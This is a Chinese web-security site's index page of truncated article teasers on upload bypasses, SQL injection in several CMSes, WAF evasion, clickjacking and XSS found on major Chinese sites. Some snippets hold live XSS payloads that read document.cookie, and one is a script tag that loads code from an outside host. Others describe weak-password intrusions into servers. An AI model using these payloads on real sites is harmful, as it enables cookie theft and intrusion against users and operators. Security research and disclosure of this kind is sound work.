简单分析一个上传函数　上传漏洞突破 - 网站安关注热度:42

Function fnUploadImg(ByVal upFile As HttpPostedFile, ByVal uploadPath As String) As String Dim result As String = Dim intImgSize As Int32 intImgSize = upFile Conten..[详情]

维科家纺一分机服务器弱口令信息泄漏直接渗透关注热度:28

维科家纺一在115 X X 133服务器被探测到使用弱口令，从而进入ftp探寻资源，虽然没有权限上传文件，但是ftp服务器放的两个重点文件引起关注，分别是web config和端口 jpgweb config里面包含了..[详情]

WordPress VideoWhisper Live Streaming Integration多个目录遍关注热度:27

受影响系统：WordPress VideoWhisper Live Streaming Integration = 4 27 3描述：BUGTRAQID:65877CVE(CAN) ID:CVE-2014-1907WordPress VideoWhisper Live Streaming Integration软件可以将视频广播功..[详情]

Web应用安全保障“六要素” - 网站安全 - 自学p关注热度:23

Web应用程序比客户端应用程序更难保证安全性，因为它不像web服务器有四五个主要供应商的web服务器，它有大量的web应用程序和自定义脚本数量，而且每个都可能包含潜在的漏洞。对于..[详情]

网络时代 web数据安全防护的八大要诀 - 网站安全关注热度:21

如果说20世纪初期被称为计算机时代的话，那么现在无疑进入了网络时代。计算机作为构架网络的最初的终端已经逐渐被新的终端所取代，虽然网络还是需要终端，但是在这个时代，网络..[详情]

对特斯拉公司官网的一次渗透测试 - 网站安全关注热度:28

特斯拉是一家非常酷的公司，由PayPal的Elon Musk与SpaceX投资创建。该公司设计、生产并销售下一代电动汽车，以缓和全球变暖问题和提高生活质量。我非常喜欢这家公司，因此当得知他们..[详情]

WEB攻击的检测之道 - 网站安全 - 自学php关注热度:31

随着各种基于Internet的安全攻击频发，Web安全已经成为业界的热门话题。WEB遭遇攻击的原因很多，所以WEB攻击检测也尤为重要。下面，我们一起分享一下国内专注于web安全研究开发的领军..[详情]

用SVG绕过浏览器XSS审计 - 网站安全 - 自学php关注热度:28

[Translated From]：http: insert-script blogspot com 2014 02 svg-fun-time-firefox-svg-vector html======================SVG - use element======================SVG中的use元素用于重用其他元素..[详情]

OASIS Web服务安全之安全令牌 - 网站安全 - 自学p关注热度:24

在追寻Web服务安全方面，有两个主要的方法。W3C采用加密和XML方法来确保来自Web服务的数据不会被拦截。OASIS(WS-I也将其前期工作交给OASIS)采用基于安全口令的方法来保证只有通过认证的..[详情]

DedeCMS最新通杀注入(buy_action.php)漏洞分析 - 网站安关注热度:22

0x00 前言前两天，乌云白帽子提交了两个DedeCMS的通杀注入漏洞，闹得沸沸扬扬，25号织梦官方发布了补丁，于是就下载最新代码回来做了对比，这里简单的分析下其中的一个注入。0x01 漏..[详情]

深入理解SQL注入绕过WAF和过滤机制 - 网站安全关注热度:35

知己知彼，百战不殆 --孙子兵法[目录]0x0 前言0x1 WAF的常见特征0x2 绕过WAF的方法0x3 SQLi Filter的实现及Evasion0x4 延伸及测试向量示例0x5 本文小结0x6 参考资料0x0 前言促使本文产生最初的动机..[详情]

应急响应中web后门排查与高效分析web日志技巧关注热度:25

举例事件场景： XX公司网站首页被做了搜索引擎劫持，跳转到博彩网站，XX公司技术负责人早上9点10分发现情况，联系到我们公司，希望给他们做一次远程应急，需求是[清除web后门，分..[详情]

cyask 前台xss与后台Getshell - 网站安全 - 自学php关注热度:44

首先是注册一枚然后查看会员资料，发现xss已经成功的触发了关于后台拿shell，在配置文件出插入? 1..[详情]

XSS BYPASS WAF小记 - 网站安全 - 自学php关注热度:27

实例1,WAF Filter: onmouseoverinput type=text name=firstname value=Anna onmouseover=alert(lsquo;XSS within input fieldrsquo;) ByPass: %dinput type=text name=firstname value=Ann..[详情]

一次靠运气成分的提权 - 网站安全 - 自学php关注热度:22

因为常用的那个服务器丢了，所以今天就无事来扫FTP扫的河南一机房的段子。扫到一个弱口令的，进之翻了翻文件夹发现没什么显眼的正想关掉，忽然看到index文件夹里有个html文件感觉..[详情]

百度相册存储型XSS漏洞指谁打谁，可对用户留置关注热度:26

1 插入不要闭合的代码：script src=http: q601333824 duapp com 3 js2 代码存在的位置3 评论变成了null,但是百度首页有提醒，个人中心也能弹出来修复方案：过滤..[详情]

siteserver最新版3.6.4 sql inject 第十蛋 - 网站安全关注热度:37

第11个注入存在 siteserver cms console_logSite aspx用 NET Reflector 反编译SiteServer CMS dll这个文件查看代码如下：public void Page_Load(object sender, EventArgs E){ int num; E..[详情]

360shop官网post注入一枚 - 网站安全 - 自学php关注热度:41

漏洞网站：http: www 360shop com cnpost信息：POST register php HTTP 1 1Content-Length: 254Content-Type: application x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http: www..[详情]

phpcms2008会员中心某处xss - 网站安全 - 自学php关注热度:23

再会员中心随处修改资料，写入xss代码。诱发管理后台点击? 1 2 3..[详情]

上传漏洞科普[1]-文件上传表单是Web安全主要威胁关注热度:22

为了让最终用户将文件上传到您的网站，就像是给危及您的服务器的恶意用户打开了另一扇门。即便如此，在今天的现代互联网的Web应用程序，它是一种 常见的要求，因为它有助于提高..[详情]

上传漏洞科普[2]-js验证 - 网站安全 - 自学php关注热度:23

关于文件上传漏洞，想必玩web安全的同学们都有接触，之前本站也发布过一篇文章介绍文件上传漏洞的各种绕过方法，但是只是有文档却没有演示代码， 最近给公司一客户培训，就照文..[详情]

mXSS攻击的成因及常见种类 - 网站安全 - 自学php关注热度:21

0x00 译者的话本文原文是由国外大牛Mario Heiderich在2013年所写的一篇paper：mXSS attacks: attacking well-secured web-applications by using innerHTML mutations 本人觉得此类mXSS攻击较为隐蔽..[详情]

手动web应用程序渗透测试-模糊测试中的后缀与前关注热度:16

介绍本文重点讲述采用模糊测试的方法测试目标Web应用程序时，可利用的前缀和后缀语法。句法后缀语法-字母字符+特殊字符（Suffix Syntax ndash; AlphabeticsSpecialcharacters）指字母字符后加特..[详情]

新浪微博点击劫持刷粉丝 - 网站安全 - 自学php关注热度:25

微博主站检测了是否被iframe，不过手机站没有检测。参考测试代码参考：htmlheadtitleclickjacking titlescript function showHide_frame() { var text_1 = docume..[详情]

清竹虚拟主机管理系统sql注入 + 后台构造cookie登关注热度:28

清竹虚拟主机管理系统sql注入漏洞NCompany Index asploadfile_fromcache templatePathNCompany-Index html 39;加载index html模板TempCon=TempConApplication(Qz_TP_templatePathNComp..[详情]

phpcms v9 SQL注入漏洞（第二弹） - 网站安全 - 自学关注热度:25

漏洞文件发生在phpcms modules member index php中392行public function account_manage_info() { account_manage_info方法，就是更新个人资料if(isset($_POST[ 39;dosubmit 39;])) { 更新用户昵称$..[详情]

腾讯视频主站分享至微信xss一枚，可cookie哦！关注热度:46

http: v qq com share weixin html?url=javascript：alert(document cookie)title=分享至微信分享至微信url过滤不严 导致xsshttp: v qq com share weixin html?url=javascript：alert(document cookie)titl..[详情]

搜狐家居论坛有一个通杀所有子论坛的xss - 网站关注热度:29

随便找一个论坛链接http: home focus cn msgview 1632 270131257 html在个人签名处输入：pimg height=0 onerror=alert( 亲，这里有个xss漏洞你们知道吗 );alert(document cookie) src= width=0..[详情]

TCCMS某处设计缺陷，成功打入官网后台 - 网站安全关注热度:22

问题发生在app controller user class php146行public function update() {$_Obj = M ( 39;user 39; );if (($_POST [ 39;info 39;] [ 39;password 39;] !== $_POST [ 39;password1 39;])..[详情]

Flash XSS 漏洞详解 根治的好办法 - 网站安全 - 自学关注热度:39

本文的目的是深层次的分析Flash的ExternalInterface的XSS漏洞，并提出比较有效的解决方案。首先，我们看看什么情况下，会出现XSS。第一种情况：把flashvars传入的参数（或者其他能被别人控..[详情]